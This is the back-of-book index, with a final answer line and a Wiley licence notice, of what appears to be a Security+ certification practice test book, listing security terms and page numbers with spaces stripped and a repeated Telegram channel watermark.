127. D. Privacynoticesarefrequentlyprovidedaspartoflicenseorcontractualterms,aswellasinwebsiteusageagreements.
Telegram Channel @nettrain
IndexA
academicjournals,211
acceptableusepolicy(AUP),161,172,283,290
accesscontrollists(ACLs),130,266–267
accesspolicies,265–266
accounts
disabling,254
Guest,103–104,113,251,258
service,251,293
user,258
activenodes,238–239
activereconnaissance,29,203
activescans,16,195
adhocwirelessnetworks,98–99,248
AddressResolutionProtocol(ARP)
blocking,257
poisoning,2,7,24,25,186,190,200
spoofing,200
administrativecontrols,287
AdvancedEncryptionStandard(AES),52,217
advancedpersistentthreats(APTs),13,18,20,21,191,193,196,197,273
adware,17,193,195,198
airgapping,78,213,235
AISservice,208
Telegram Channel @nettrain
alarms,68,227–228
allowlists,130,266–267
annuallossexpectancy(ALE),167,169,287,289
annualrateofoccurrence(ARO),169,287,289,295
anomaly-baseddetectionsystems,263
anonymization,171–172,290
antivirus(AV)programs,10,165,191,284,285
Apachelog,38,209
applicationblocklist,274
applicationcounter,221
applicationprogramminginterface(API),5,51,79,188,216,236,258
Arduino,48,214
artifacts,270,272
artificialintelligence(AI),210
assetmanagementpolicies,291
assetvalue(AV),295
asymmetriccryptography,71,230
asymmetricwarfare,196
@command,275
attestationprocesses,233
attribute-basedaccesscontrol(ABAC),114,255,259
audiosteganography,77,234
audit/auditing,196,198,262
authentication,authorization,andaccounting(AAA),231
AuthenticationHeader(AH),85,239,248
authority,24,200
automation,225
Telegram Channel @nettrain
Autopsy,274,275
awarenesstraining,5,188
B
backdoor,8,19,21,22,24,190,196,198,200
back-offalgorithms,246
backups,130–131,267
badges,66,226
BadUSB,199
baselineconfigurations,53,217
baselining,56,219,245
Bashshell,26,150,201,278
bastionhost,249
Bcryptalgorithm,80,236
biometricscans,48,214–215
birthdayattack,11,12,21,28,192,198,203
bit,214
BitLockerkeys,230
blackhole,52,216
black-boxtest,190,200,201,203,204
blacklisting,91,243,244
blockcipher,214
blockchain,51,216
blueteams,4–5,22,30,188,199,204
bluejacking,3,5,10,11,27,32,186,188,191,192,202,205
bluesnarfing,5,10,32,188,191,205
bollards,55,66,219,226
bookmarks,271
Telegram Channel @nettrain
bootattestation,254
bootsectorvirus,16,17,195
botnets,7,17,189,195
BridgeProtocolDataUnit(BDPU),262
bringyourowndevice(BYOD),105,252
brute-forceattacks,12,13,19,21,71,192,193,197,198,203,230
bufferoverflow,5,16,18,21,22,26,188,194,195,196,198,199,201,243
bugbounties,35,207
burningmedia,79,236
businesscontinuityplan(BCP),275
businessimpactanalysis(BIA),165,177,285,293
businesspartnershipagreement(BPA),162,165,179,283–284,286,294
C
cablelocks,55,219
Cacti,274
captiveportal,83,238
cardcloning,29,198,203
catcommand,269
CenterforInternetSecurity(CIS),167,174,180–181,183,287,291,297
CentOS,270
certificateauthority(CA),264
certificatechains,262
certificateexpirationtracking,204
certificatepinning,266
certificaterevocationlists(CRLs),241
certificatestapling,85,239
-cflag,268
Telegram Channel @nettrain
chainofcustody,132–133,268,273
ChallengeHandshakeAuthenticationProtocol(CHAP),106,120,251,252,263
changemanagement,161,282–283
CIAtriad,202
cleandeskpolicy,161,162,164,169,283,285,289
clickjacking,3,44,186,212
client-sidetampering,48,214
closedthreatintelligence,205
closed-circuittelevision(CCTV),71,165,230,286
cloudaccesssecuritybroker(CASB),59–60,125,222,239,265
cloudapplications,264
cloudbackups,223
CloudControlMatrixmaps,292
cloudfirewall,103,251
CloudSecurityAlliance,292,295
cloudservice
providersin,234
vulnerabilitiesin,204
code
digitallysigned,248
formatting,195
reviewing,247
signing,244
codereuseattack,61,223
coldaisle,59,221
coldsite,50,68,215,228
collisions,12,71,193,230
Telegram Channel @nettrain
collusion,169,288–289
commonname(CN),90,242
CommonVulnerabilitiesandExposures(CVE),11,192,211
communitycloud,64,65,225
compensatingcontrol,164,285,287
conditionalaccess,118,261
configuration
managing,259
reviewsof,212
weak,196
consensus,16,194
containerization,252
containment,132,150,268,278,280
contentfilter,272
Content-AddressableMemory(CAM),272
context-awareauthentication,249
ContinuityofOperationsPlanning(COOP),133,147,150,268,276,278
continuousintegration/continuousdelivery(CI/CD),64,225
controldiversity,235
controlrisks,290,296
cookies,88,241
correctivecontrol,284
correlationdashboards,130,267
countermode(CTR),50–51,215
coverageoverlap,254
credentialharvesting,5,188
credentialedscan,17,195
Telegram Channel @nettrain
criminalsyndicates,9,191
cross-overerrorrate(CER),65,70,226,229
cross-siterequestforgery(XSRF),11,16,21,26,36,44,192,194,198,201,208,212
cross-sitescripting(XSS),2,3,5,6,7,11,16,20,21,26,36,186,188,190,192,194,197,198,201,208
cryptographichashes,186,227
Cuckoo,146,276
CuckooSandbox,136,270
curlcommand,155,281
customerdata,293
CVSSstandard,132,267
CyberKillChain,132,145,267,276
cyberintelligencefusion,11,192
D
darkweb,30,203
data
governancepolicyfor,172,290
maskingof,166,286,295
minimizationof,166,182,286,296
retentionpolicyfor,167,169,287,289
storing,223
databreaches
commonresultsof,290
costof,293
notificationsfor,277
recoveringfrom,292
Telegram Channel @nettrain
datacontroller,296
DataEncryptionStandard(DES),52,217
datalossprevention(DLP),72,124,139,142–143,231,253,265,272,274,277
dataowner,296
dataprocessors,180,295
dataprotectionofficer(DPO),176,292
dataretrieval,241
datasovereignty,229
databaseadministrator(DBA),226
deadbolts,229
deepfakes,219
degaussing,79,236,258,273
demilitarizedzone(DMZ),72,78,89,90,107,108,111,112,230,231,235,242,243,253,255,257
denial-of-service(DoS)attack,22,34,38,198,206–207,209–210
deploymentpolicies,53,217
deprovisioning,56,219
detectivecontrol,163,164,167,284,285,286,287
deterrentcontrol,164,167,284,285,287
developmentserver,51,216
DiamondModel,132,267
dictionaryattacks,9,12,28,191,192,203
differentialbackups,65,225
digitalcertificates,246,260
digitalforensics,57,220,268,270,272,273,277,281–282
digitalsignatures,48,76,214,233
directorytraversalattacks,30–31,204
Telegram Channel @nettrain
disassociationattack,12,13,192,193
disasterrecovery(DR)plan,147,154,172,175,180,276,281,290,292,296
discretionaryaccesscontrol(DAC),111,114,257,259
diskbackup,62,223
DistinguishedEncodingRules(DER)format,126,266
distributeddenial-of-service(DDoS)attack,13,22,187,190,193,195,198,222
DLLinjection,18,196
DNSlogs,133,268–269
dnsenumtool,147,276,277
domainexperts,207
domainhijacking,6,189
DomainNameSystem(DNS)
DNShijacking,6,189
DNSserver,212
DNSsinkhole,58,221
poisoningattacks,7,21,24,190,198,200
DomainNameSystemSecurityExtension(DNSSEC),99,238,248
domainreputationservices,8,190
domaintheft,189
downgradeattacks,12,31,193,204
drones,57,206,220,233
dualcontrol,237
duecare,161,282–283
duediligence,161,282–283
dumpfile,279
dumpsterdiving,28,191,202
dynamiccodereview,247
Telegram Channel @nettrain
DynamicHostConfigurationProtocol(DHCP),87,101,240,250,279
E
EAPTunneledTransportLayerSecurity(EAP-TTLS),94,245,251
EAP-FAST,94,245
east-westtraffic,82,237
edgecomputing,74,232,236
802.1x,80,119,236,262
elasticity,incloudcomputing,56,226
electromagneticinterference(EML),218
electronicdiscovery(e-discovery),282
electroniclocks,229
elicitation,16,195
ellipticalcurvecryptography(ECC),74,214,215,232
emailheaders,278
embeddedsystems,216,224
encryption,76,78,101,234,235,249
encryptionkeys,231
endoflife(EOL),183,297
endpointdetectionandresponse(EDR),102,250
entropy,54,218
errorhandling,14,44,194,212
escalation,284
eviltwinattack,10,11,20,24,32,191,192,197,200,205
exitinterviews,193,297
exposurefactor(EF),295
extendedvalidation(EV),252
ExtensibleAuthenticationProtocol(EAP),251
Telegram Channel @nettrain
F
facialrecognitionsystems,71,223,230
faketelemetry,56,219
falseacceptancerate(FAR),70,226,229
falsenegative,15,36,194,208
falsepositive,15,36,194,208
falserejectionrate(FRR),70,229
familiarity,16,194
Faradaycage,55,69,218,229,233
FederalBureauofInvestigations(FBI),150,278
FederalEmergencyManagementAgency(FEMA),150,278
FederalTradeCommission(FTC),174,291
Feedburner,34,206
fencing,232
FIDOU2F,84,238
field-programmablegatearray(FPGA),48,214
filepermissions,266
FileTransferProtocol(FTP),16,195
FileTransferProtocolSecure(FTPS),239
filelessvirus,199
filesystems,256
fingerprintreadersystems,62,223
firewalls,77,88,216,234,241,286
firmware,223,269
5G,79,236
fogaggregator,101,249
fogcomputing,80,236
Telegram Channel @nettrain
footprinting,35,207
formattingcode,195
forwardproxy,112,114,257
FTKImager,270,274
full-diskencryption(FDE),52,63,90,112,117,216–217,219,224,226,242,252,253,258,261,275
fullyqualifieddomainname(FQDN),242
function-as-a-service(FaaS),221
fuzzing,101,245,249–250,252
G
gaitanalysis,64,225
gamification,175,292
GeneralDataProtectionRegulation(GDPR),162,170,283,289,292
generator,75,233
generators,165–166,286
geofence,95,245
geolocation,213
GitHub,40,210
GlobalPositioningSystem(GPS),89,241
governmentdata,290
graymarket,38,209
gray-boxtest,201
grepcommand,144,275
Guestaccounts,103–104,113,251,258
H
hacktivism,196
hacktivists,18,19,39,196,210
Telegram Channel @nettrain
hardening,93,242,244,259
hardwarefirewall,103,251
hardwaresecuritymodel(HSM),52,95,217,246,256,259
hashfunctions,47,213,214
hashing,101,130,249,266,269,275,295
hashingpasswords,71,74,223,230,232,244
headcommand,269
healthinformation,172,290
heatmaps,243
HMAC-basedone-timepassword(HOTP),69,228,231,238
hoax,36,208
homomorphicencryption,62,223
honeyfiles,80,236
honeynets,52,215,216
honeypots,49–50,52,215,216,219
host-basedfirewalls,117,261
host-basedintrusionpreventionsystem(HIPS),117,259,261
hotaisle,59,221
hotsite,50,68,215,228
hpingtool,152,279
HTTPports,211
HVACsystems,53,218
hybridcomputing,74,232
hybriddeploymentmodel,65,225
hybridmodels,54,218
hybridwarfare,36,208
hypervisor,54,218,273
Telegram Channel @nettrain
I
identityandaccessmanagement(IAM),231
identityattributes,242
identityfraud,39,210
identityprovider(IdP),83,238
identitytheft,210
identity-as-a-service(IDaaS),58,221
impactcategories,211
impersonation,16,195
incidentresponse,267,273,276,278
indicatorsofcompromise(IoC),4,187
industrialcamouflage,72,230
inertgassystems,233
InformationSharingandAnalysisCenters(ISACs),206
infrared(IR),71,230,251
infrastructureasaservice(IaaS),54,58,64,78,209,218,221,225,235,253
infrastructureascode(IaC),60,222
inherentrisk,179,181,295
initializationvectors(IVs),2,11,186,192,232
inputhandling,40,210
inputvalidation,2,186,243,249–250
insiderthreats,18,196,261
integeroverflow,22,26,199,201
integritychecking,56,219
intelligencefusion,33,205
interconnectionsecurityagreement(ISA),162,176,283–284,292
internaldisaster,296
Telegram Channel @nettrain
internalrisks,289
internalservices,255
InternationalOrganizationforStandardization(ISO),295
Internetkeyexchange(IKE),249
InternetRelayChat(IRC),202
intrusiondetectionsystem(IDS),2,13,49–50,52,58,117,139,174,186,193,215,216,221,227,241,250,261,272,291
intrusionpreventionsystem(IPS),38,52,113,165,188,209–210,211,216,227,241,253,258,261,279,286,291
intrusivescan,17,19,195,196
invoicescams,25,200
IPaddresses,70,216,229,240,250,266
IPspoofing,20,23,44,197,199,212
IPFIX,156,282
IPSec,88,143,239,241,263,274
iptables,273
irisscans,62,223
ISA/IECstandards,46,212
ISO27002,161,282
ISO27017,161,282
ITprocess,277
J
jailbreaking,104,252
jammingattack,2,186
jobrotationpolicy,161,164,166,169,179,283,284–285,286,288–289,294
JohntheRipper,149,278
journalctltool,155,156,281,282
Telegram Channel @nettrain
jumpboxes,253
jurisdictionalboundaries,149,278
K
Kerberos,60,102,103,106,107,109,116,222,250,251,252,254,260
keydistributioncenter(KDC),116,260
keyescrow,108,254
keylength,231
keyreuse,72,73,230,232
keystretching,48,214,236
keylogger,13,193
keys,214
knowledge-basedauthentication,242
knownenvironmenttest,7–8,17,24,25,31,190,195,200,201,204
L
lateralmovement,15,194
leastconnection-basedloadbalancing,85,239
leastprivilege,161,282
legacysystems,33–34,206,291
legalhold,280
lighting,asadeterrent,74,232
LightweightDirectoryAccessProtocol(LDAP),29,56,80,96,203,219,236,246,255
LightweightExtensibleAuthenticationProtocol(LEAP),104,237,251
Linuxkernel,232
Linuxprivilege,207
loadbalancing,102,247,250
locks,69,70,162,181,229,283,296
Telegram Channel @nettrain
logaggregation,4,187,196
loggerutility,273
logging,199
logicbomb,2,9,10,14,16,18,19,22,27,28,186,190,191,194,195,196,199,201,202
loopprotection,123,264
low-powerdevices,70–71,229–230
M
machinelearning(ML),207,210
macrovirus,9,17,190,195
malware,8,26,27,186,189,190,191,194,195,196,201,212,237–238,282
managedsecurityserviceproviders(MSSPs),227
mandatoryaccesscontrol(MAC),14,111,114,193,233,257,259,281,294
mandatoryvacationpolicy,161,162,283
man-in-the-browserattack,26,201
mantrap,219
mappingnetworks,271
masking,74,78,232,235
MD5,80,236,269
meantimebetweenfailures(MTBF),168,169,171,172,288,289,290
meantimetorepair(MTTR),168,169,171,288,289,290
measuredboot,259
media,burning,236
MediaAccessControl(MAC),188
memdumptool,273
memorandumofunderstanding(MOU),162,176,179,183,283–284,292,294,297
Telegram Channel @nettrain
memoryexhaustion,202
memoryleaks,22,199,201,202,231
Metasploit,146,276
MFPs,222
microcontroller,214
microservicearchitectures,222
MicrosoftOffice,277
misconfiguration,192
mistcomputing,74,232
MITREATT&CKframework,132,267
mobileapplicationmanagement(MAM),264
mobiledevicemanagement(MDM),82–83,113,116,117,124,237,258,260,265,272,275
motionactivation,71,230
motiondetection,69,228
motionrecognition,58,221
multifactorauthentication,5,78,188,235,262
multipartitevirus,27,201
multipartyrisk,183,297
MultipurposeInternetMailExtensions(MIME)sniffing,82,237
MXrecords,270
N
namingconventions,224
NationalInstituteofStandardsandTechnology(NIST),180–181,295
NationalSecurityAgency(NSA),150,174,278,291,297
nation-stateactors,19,196,197
naturaldisasters,76,233
Telegram Channel @nettrain
Near-FieldCommunication(NFC),23,103,199,251
Nessus,134–135,146,269,276
netusercommand,262
netcatcommand,137,270
NetFlow,134,269,271
netstatcommand,133,153,156,268,280,282
networkaddresstranslation(NAT),102,118,250,261
networkattachedstorage(NAS),46,62,213,223
networkflows,269,271
networkinterfacecards(NICs),229
networkintrusiondetectionsystem(NIDS),67,227
networkintrusionpreventionsystem(NIPS),52,67,216–217,227,249
networkloadbalancers,77,234
networklocation,213
networktaps,248
NetworkTimeProtocol(NTP),240,251
network-basedintrusionpreventionsystem(NIPS),100,248
NewTechnologyLANManager(NTLM),102,109,250,254
next-generationfirewalls(NGFWs),111–112,256,257,264
NICteaming,70,229
NIST800-12,282
NIST800-14,282
nmaptool,133,268
nondisclosureagreement(NDA),162,179,183,283,286,294,297
nonintrusivescan,19,196
normalization,56,219,226
NorthAmericanElectricReliabilityCorporation(NERC),46,212
Telegram Channel @nettrain
NULLpointer,3,187
NXLog,150,156,278,282
O
OATH-HOTP,238
OAuth,60,80,107,110,222,236,253,255,263
objectdetection,69,228
offboarding,164,170,193,284–285,289,297
offsitestorage,224
onboarding,162,164,166,170,283,284–285,286,289
OneTimePassword(OTP),238
OnlineCertificateStatusProtocol(OCSP),89,239,241
on-path(man-in-the-middle)attack,25,26,28,201,202
on-premisescloudcomputing,235
on-premisesnetworks,217
opensourcefirewalls,265
opensourceintelligence(OSINT),4,16,29,31,32,187,189,195,203,205
OpenWebApplicationSecurityProject(OWASP),46,211,212
OpenID,56,60,100,107,109,110,219,222,248,253,254,255,263
OpenPGP,238
OpenSSL,275
opensslcommand,269
OpenVASscanner,42,211
operatingsystem(OS)threats,114–115,215,259
operationalsecurity(OPSEC),29,203
operationaltechnology(OT),35–36,198,207–208
orderofvolatility,273–274
originalequipmentmanufacturer(OEM),72,231
Telegram Channel @nettrain
out-of-band(OOB)management,108,253
over-the-air(OTA),123,264
P
packetcapture,4,187
parkingpolicy,164,285
partiallyknownenvironmenttest,195,201
passivereconnaissance,29,189,203
pass-the-hashattack,24,191,200
PasswordAuthenticationProtocol(PAP),103,251
passwordcracker,275,278
passwordhashing,247
passwordhistory,262
passwordmanagers,248
passwordspraying,19,197
passwordvaults,248
passwords
aging,263
complexityof,258
storing,142,208,274
patching,95,174,246,281,291
pathping,276
PaymentCardIndustryDataSecurityStandard(PCI-DSS),162,171,175,283,290,292
PBKDF2algorithm,236
penetrationtests,5,28,37,68,188,191,196,199,202,205,209,227–228
pepper,3,186
perfectforwardsecrecy(PFS),49,214
Telegram Channel @nettrain
permissions
auditing,257
setting,35,207
permissionscreep,3,187
personalidentificationnumber(PIN),241
PersonalInformationExchange(PFX),87–88,240–241
personallyidentifiableinformation(PII),235,291
personnelcredentialpolicy,293
-pflag,267
pharmingattacks,19,197
phishing,2,6,9,13,23,25,27,28,36,186,189,191,193,199,200,202,208,217
picturepasswords,47,213
piecharts,31,205
pingcommand,271
pivot,8,190
plain-textpasswordattack,10,191
platformasaservice(PaaS),54,58,64,73,78,218,221,225,232,235
playbooks,142,154,274,276,281
point-to-multipointtopology,248
point-to-pointtopology,248
policies,283,285,289,294
polymorphicvirus,198
POP3,85,239
portscans,211,270
portsecurity,83,238,248
Postgresserver,194
Telegram Channel @nettrain
potentiallyunwantedprograms(PUPs),14,21,29,193,198,203
powerdistributionunit(PDU),75,226,233,247
PowerShell,23,40,199,211,222
predictiveanalysis,4,187,210
prepending,20,33,37,197,206,209
preproductionenvironments,216
presharedkey(PSK),100,244–245,248
pretexting,16,33,195,206
preventivecontrols,166,167,286,287
primefactorizationalgorithms,50,215
PrivacyEnhancedMail(PEM)files,126,240–241,266
privacynotices,184,296,297
privatecloud,65,78,225,235
privatekeys,48,49,214,247,280
privilegecreep,80,236
privilegeescalation,13,15,20,34,193,194,197,206–207
privilegescan,195
privilegedaccessmanagement(PAM),265
productionserver,51,216
proprietarydata,285,293
proprietaryintelligence,32,205
protectedcabledistribution,77,234
ProtectedExtensibleAuthenticationProtocol(PEAP),94,237,245
protocols,212
provenance,151,275,279
proximitycardreaders,75,233
PRTG,274
Telegram Channel @nettrain
pseudonymization,171–172,290
publiccloud,64,65,225
publickeyinfrastructure(PKI),256,264
publickeys,48,49,214,247
purpleteams,4–5,22,30,188,199,204
pushnotifications,82–83,237
Python,17,195
Q
qualitativeriskassessment,162,165,174–175,283,285,291
qualityassurance(QA),216
quantitativeriskassessment,162,165,168,174–175,283,285,288,291
quantumcomputing,72,231
quantumcryptography,215
quantumencryption,50,215
quarantineprocess,153,272,280
Qubits,215
quickformatting,148,277
R
raceconditions,14,23,194,199
radiofrequencyidentifier(RFID),11,23,27,75,96,192,199,202,233,246
RAID,55,56,71,218,219,230
rainbowtables,9,12,21,191,193,198,203,298
ransomware,22,199
RaspberryPi,48,214
ratelimiting,246
rebooting,276
Telegram Channel @nettrain
reconnaissancephase,ofpenetrationtesting,37,209
recovery,131,267
recoverypointobjective(RPO),169,289
recoverytimeobjective(RTO),166,177,287,292
RedHat,270
redteams,4–5,22,24,30,188,199,200,204
refactoring,8,36,190,208
registrationauthority(RA),239
remoteaccess,246
RemoteAuthenticationDial-inUserService(RADIUS),56,100,219,231,246,248
remoteregistry,254
remotewipe,82–83,237,252
remote-accessTrojan(RAT),10,14,17,21,29,32,191,193,195,198,203,205
replayattack,25,29,201,203
reputationalgains,210
requestsforcomments(RFCs),63,224
resourceconstraints,234
resourcepolicies,54,218
resource-basedpolicies,98,247
restorationorder,213
retentionpolicies,138,271
retinascans,62,223
reverseproxy,112,114,125,127,257,266
reverseshell,205
-Rflag,272
right-to-auditclauses,280
Telegram Channel @nettrain
riskacceptance,163,166,167,168,284,287,288
riskavoidance,163,166,167,168,284,287,288
riskheatmaps,174–175,291
riskmitigation,163,166,167,168,182,284,287,288,297
riskregister,166,171,287,290
risktransfer,163,166,167,168,284,287,288
robocalling,28,202
rogueaccesspoint,3,11,186,192
role-basedaccesscontrol(RBAC),110,111,114,255,257,259
rootcertificate,249
rootgrabbing,13,193
RootGuard,240
rootkit,2,9,10,13,14,19,22,27,186,190,191,193,194,196,199,201,202
routecommand,268
RSAkey,49,214
RSH,16,195
RTO,50,215
RTOS,61,223
ruleofengagement,forpenetrationtests,32,205
rule-basedaccesscontrol,255
S
salts,3,49,79,186,214,223,235
sandboxing,53,54,217,218,244
scalability,incloudcomputing,56,226
scanlesstool,136,270
scarcity,5,16,188,194
scriptkiddies,6,18,33,189,196,205
Telegram Channel @nettrain
scripting,65,225
scryptalgorithm,236
secretsmanagementservices,102,250
securecookies,241
secureIMAPs,247
SecureLightweightDirectoryAccessProtocol(LDAPS),115,259
SecurePOP3,84,238
SecureShell(SSH),43,86,97,98,195,212,238,240,247,253,278
SecureSocketsLayer(SSL),31,67,204,220,227
Secure/MultipurposeInternetMailExtensions(S/MIME),84,238
SecurityAccountManager(SAM)file,204
SecurityAssertionMarkupLanguage(SAML),56,60,80,102,116,219,222,236,250,253,255,260,263
securityaudits,5,188
SecurityEnhancedLinus(SELinux),265
securitygroups,117,261
securityguard,59,69,221,229
securityinformationandeventmanagement(SIEM)device,4,31,72,187–188,204,205,210,231,249
securitymonitoring,187–188
securityorchestration,automation,andresponse(SOAR),8,31,39,190,204,210
securityzones,90,242–243
segmentation,150,151,255,275,278,279
segmentationfault,187
self-encryptingdrive(SED),52,63,217,224
self-signedcertificate,87,240
sensorappliances,247
Telegram Channel @nettrain
sensors,272
separationofduties,166,169,179,286,288–289,294
serverlessarchitectures,58,221
server-siderequestforgery(SSRF),7,36,189,208
serviceaccounts,251,293
servicelevelagreement(SLA),162,176,179,283–284,286,292,294
serviceorganizationreport(SOC),39,210
ServiceSetIdentifiers(SSIDs),246
sessionhijacking,3,12,13,18,26,186,192,193,196,201
sessionIDs,211
SessionInitiationProtocol(SIP),239,270,278
sessionpersistence,253
sFlow,269,271
SFTP,195
SHA1algorithm,80,236,269
shimming,8,24,190,200
ShivaPasswordAuthenticationProtocol(SPAP),103,251
shortmessageservice(SMS)messages,69,217,228
shouldersurfing,25,28,33,200,202,206
signage,68,228
silentpatching,36,208
SimpleNetworkManagementProtocol(SNMP),98,120,126,247,252,263,266,274
simulation,272
simultaneousauthenticationofequals(SAE),243
singlelossexpectancy(SLE),163,284,295
singlepointoffailure(SPOF),168,176,288,292
Telegram Channel @nettrain
SingleSign-On(SSO),113,255,258
sitesurvey,237
skimmer,29,203
smartcards,68,69,227,229,238
smishing,27,189,202
SMSpushes,234
Smurfattack,25,200
snapshots,54,65,218,225
SOC2engagement,294
socialengineering,9,16,24,187,191,194,195,200,206
sociallogin,73,231
socialmediainfluencecampaigns,18,196
socialproof,194
software
compiling,63,224
updatesfor,202
softwareasaservice(SaaS),54,58,73,218,221,232
softwarefirewall,103,251
software-definednetworking(SDN),52,55,59,67,217,218,221,227
sourcecode,290
SourceForge,40,210
spam,6,189
sparseinfectorvirus,195
spearphishing,2,9,28,186,189,191,202
SPIM,3,187
splithorizonDNS,99,248
split-tunnelVPNs,123,264
Telegram Channel @nettrain
spyware,14,193,198
SQLinjection,2,3,10,20,22,51,57,186,189,191,197,198,216,220,245,280
SRTP,238
SSHFileTransferProtocol(SFTP),252
stagingenvironments,51,216
stagingserver,53,217
stakeholdermanagement,133,138,268,271
standards,224
stateactors,18,196
statelaws,294
statefulinspectionfirewall,91,243
statefulpacketinspection(SPI),91,243
statelessfirewall,255
StatementofStandardsforAttestationEngagements(SSAEs),290
staticcodes,230,245,247,252
storageareanetwork(SAN),54,62,218,223
storedprocedures,66,220,226
stormcontrol,257
streamciphers,192
stringinjection,243
stringscommand,136,270
StructuredQueryLanguage(SQL),203
StructuredThreatIntelligenceExchange(STIX)protocol,23,29,199,203
SubjectAlternateName(SAN),246
subnetmask,46,212
subscriberidentitymodule(SIM),234
Telegram Channel @nettrain
subscriptionservices,241
SupervisoryControlandDataAcquisition(SCADA)system,52,67,215,216–217,227
supplychainrisk,291
swapfiles,34,206–207,273
symmetriccryptography,71,230
symmetricencryption,49,53–54,214,218
SYNflood,33,206,243
syslog,38,152,156,209,279,282
systemcrashfile,274
systemdumpfile,274
systemonachip(SoC),224
systemrestorepoint,68,228
T
tabletopexercises,267
taggingdrives,279
tailcommand,269
tailgating,23,39,199,210
tapebackups,62,223
TAXII,23,199
TCPhandshakes,4,187
TCPport23,34,206
TCPport443,43,212
tcpdump,267
tcpreplaytool,279
technicalcontrols,286
Telnet,16,43,195,206,212
Telegram Channel @nettrain
TerminalAccessControllerAccessControlSystemPlus(TACACS+),116,260
terminateandstayresident(TSR),220
testserver,51,216
testing,284
theHarvester,132,267
third-partycode,risksof,59,222
third-partycredentialpolicies,295
third-partyrisks,210
third-partysecuredestructioncompanies,47,213
threatactors,207
threatassessment,165,285
threathunting,37,208
threatintelligence,205
threatmaps,31,205
threatvectors,40,210
thumbdrives,71,230
time-basedone-timepassword(TOTP),69,228
timeboxing,249–250
timelines,building,277
time-to-live(TTL),137–138,271
TLSinspection,56,220
tokenization,74,101,180,232,249,295,296
tokens,77,78,110,235,255
Tor,30,203
TOTP,238
tracertcommand,143,147,274,276
traffic,stopping,244
Telegram Channel @nettrain
training,284,292
transitgateways,53,217
TransportLayerSecurity(TLS),67,86,90,103,104,105,108,193,227,239,240,242,251,252,253
trends,281
Trojanhorse,2,8,9,14,17,19,21,27,28,31,34,44,186,190,193,194,195,196,198,199,201,202,204,206–207,212
trustedboot,259
TrustedFoundry,31,46,205,212
TrustedPlatformModule(TPM),55,63,90,115,218,224,226,242,244,249,250,259,264
trust/trusting,24,200,210,244
two-factorauthentication,219
two-personcontrolschemes,73,231
typosquatting,6,44,188–189,212
U
UEFISecureBoot,263
unifiedendpointmanagement(UEM),116,260
UnifiedExtensibleFirmwareInterface(UEFI),115,254,259,261,263
unifiedthreatmanagement(UTM),258
uniformresourcelocator(URL)
URLfilter,154,281
URLredirection,26,30,201,204
URLshortening,204
uninterruptiblepowersupply(UPS),66,75,226,233,247
universalendpointmanagement(UEM),125,265
unknownenvironmenttest,7–8,24,25,31,190,195,200,201,204
unmannedaerialvehicles(UAVs),76,233
Telegram Channel @nettrain
urgency,24,200
U.S.DepartmentofAgriculture(USDA),150,278
USBdatablockers,73,231
useraccounts,258
userbehavioranalysis,187
V
vendordiversity,46,213,237–238
vendorsupport,7,9,189,191
versionnumbering,67,227
verticalmovement,15,194
-vflag,280
VirtualDesktopInfrastructure(VDI),94,222,245
virtualfirewall,103,251,261
virtualIP(VIP),247
virtualLAN(VLAN),90,242–243,260
virtualmachine(VM)
escapeattacks,57,58,66,220,226
forensics,278
sprawl,57,66,220,226
virtualprivateclouds(VPCs),217,261
virtualprivatenetwork(VPN),86,90,95,240,242,245,250
virtualization,220
virus,28,202
vishing,28,53,202,217,239
VisualBasicforApplication(VBA)script,195
VoiceoverInternetProtocol(VoIP),77,234
Volatilityframework,279
Telegram Channel @nettrain
vulnerabilityassessment,30,162,204,283
vulnerabilityscans,5,25,43,188,200,211,212
W
wardialing,28,86,202,207,239
wardriving,16,195
warflying,16,33,195,206
warwalking,195,207
warmsite,50,68,215,228
wateringholeattacks,18,29,33,37,196,203,206,209
wearables,228
webapplicationfirewall(WAF),52,103,154,186,211,216,251,281
webpagetitles,270
webproxy,250,252
whaling,9,22,37,191,199,209
whiteteams,4–5,22,30,35,188,199,204,207
white-boxtest,190,200,201,203,204
whitelisting,91,243
Wi-Fihotspots,190
Wi-Finetworks,252
Wi-FiProtectedSetup(WPS),2,88,186,192,241
wildcardcertificate,87,240
WindowsDefenderFirewall,148,277
WinHex,274
wirelessaccesspoint(WAP),2,3,186
wirelessnetworkheatmaps,91–92,243
wirelessrouters,204
Wireshark,136,137,138,152,270,271,278,279
Telegram Channel @nettrain
worms,13,23,28,29,193,199,202,203
WPA,92,113,120,124,243,258,262,265
X
XaaS,68,228
XMLinjection,209
Z
zero-daydisclosure,35,207
zero-dayexploits,20,191,197
zero-knowledgetest,190
zero-trustenvironment,260
zero-wiping,271
Zigbee,61,223
Telegram Channel @nettrain
WILEYENDUSERLICENSEAGREEMENTGotowww.wiley.com/go/eulatoaccessWiley’sebookEULA.
Telegram Channel @nettrain
top related